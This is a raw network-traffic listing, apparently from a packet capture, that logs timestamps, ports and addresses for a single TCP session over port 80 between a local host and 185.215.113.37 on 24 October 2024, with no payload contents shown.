Oct 24, 2024 13:02:16.207191944 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.207199097 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.207217932 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.207237005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.207248926 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.207264900 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.207276106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.207304001 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.208106041 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.208122969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.208139896 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.208162069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.208169937 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.208185911 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.208199024 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.208209991 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.208230972 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.208241940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.208266020 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.317373991 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.317435980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.317456007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.317488909 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.317502022 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.317696095 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.317715883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.317739010 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.317749023 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.317763090 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.317775965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.317783117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.317826986 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.318437099 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.318458080 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.318475962 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.318490982 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.318505049 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.318515062 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.318525076 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.318542004 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.318578959 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.319351912 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.319370985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.319392920 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.319401979 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.319417000 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.319425106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.319437027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.319453001 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.319474936 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.319490910 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.319499016 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.319515944 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.319538116 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.320310116 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.320332050 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.320343018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.320358038 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.320374012 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.320383072 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.320400000 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.320414066 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.320430040 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.320441961 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.320452929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.320462942 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.320499897 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.321264982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.321286917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.321300983 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.321315050 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.321327925 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.321336985 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.321353912 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.321362972 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.321379900 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.321388960 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.321407080 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.321419954 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.321434975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.321445942 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.321474075 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.322227001 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.322247982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.322263002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.322283030 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.322302103 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.322309971 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.322321892 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.322338104 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.322345018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.322364092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.322379112 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.322397947 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.323162079 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.323180914 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.323200941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.323219061 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.323226929 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.323241949 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.323254108 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.323266983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.323283911 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.323293924 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.323318958 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.323328018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.323345900 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.323385954 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.324116945 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.324137926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.324156046 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.324170113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.324177027 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.324194908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.324212074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.324229002 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.324239969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.324249983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.324266911 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.324278116 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.324305058 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.325088978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325109959 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325131893 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.325139999 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325150967 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.325167894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325176954 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.325193882 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325205088 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.325222969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325241089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.325268984 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.325846910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325866938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325889111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325906038 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.325915098 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325932980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325939894 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.325954914 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.325963974 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.325975895 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.325994968 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.326011896 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.326034069 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.326713085 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.326733112 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.326751947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.326761961 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.326773882 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.326786995 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.359060049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.359108925 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.359127045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.359173059 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.436254025 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.436323881 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.436438084 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.436454058 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.436495066 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.436559916 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.436573982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.436599016 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.436609983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.436625957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.436640024 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.436654091 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.436664104 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.436691999 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.437195063 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437207937 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437232018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437249899 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437257051 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.437257051 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.437274933 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.437287092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437303066 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437313080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.437339067 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.437848091 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437860012 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437882900 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437897921 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.437911034 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437918901 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.437935114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437953949 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437974930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.437983990 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.437994957 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.438018084 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.438622952 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.438657045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.438668013 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.438684940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.438704014 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.438709974 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.438724041 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.438739061 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.438745975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.438757896 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.438780069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.438787937 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.438800097 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.438827991 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.439519882 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.439536095 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.439558983 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.439568043 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.439580917 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.439595938 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.439605951 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.439620018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.439644098 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.439655066 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.439666033 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.439682007 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.439702988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.440421104 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.440437078 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.440457106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.440469027 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.440481901 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.440495968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.440502882 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.440516949 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.440541983 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.440553904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.440562010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.440582037 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.440588951 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.440602064 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.440630913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.441236973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.441253901 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.441283941 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.441291094 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.441298008 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.441312075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.441334009 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.441354036 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.441363096 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.441375971 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.441390991 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.441412926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.441421032 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.441431999 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.441453934 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.442156076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.442171097 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.442193985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.442203045 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.442214012 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.442224979 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.442235947 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.442253113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.442270994 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.442291975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.442311049 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.442958117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.442977905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.443002939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.443010092 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.443028927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.443038940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.443057060 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.443070889 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.443084955 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.443103075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.443110943 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.443130970 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.443170071 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.443857908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.443872929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.443892002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.443902016 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.443917990 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.443931103 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.534295082 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.534353971 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.534499884 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.534554005 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.556344032 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.556372881 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.556394100 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.556422949 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.556482077 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.556574106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.556596041 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.556627035 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.556638956 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.556804895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.556824923 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.556858063 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.556890011 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.557060003 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.557074070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.557101011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.557111979 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.557130098 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.557157040 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.557404041 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.557419062 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.557445049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.557473898 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.557486057 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.557822943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.557838917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.557864904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.557874918 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.557885885 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.557902098 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.558458090 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.558505058 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.558522940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.558547974 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.558579922 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.558772087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.558829069 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.558855057 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.558917046 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.558947086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.559020042 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.559237003 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.559324026 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.559341908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.559356928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.559384108 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.559398890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.559910059 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.559962988 CEST	49711	80	192.168.2.6	185.215.113.37
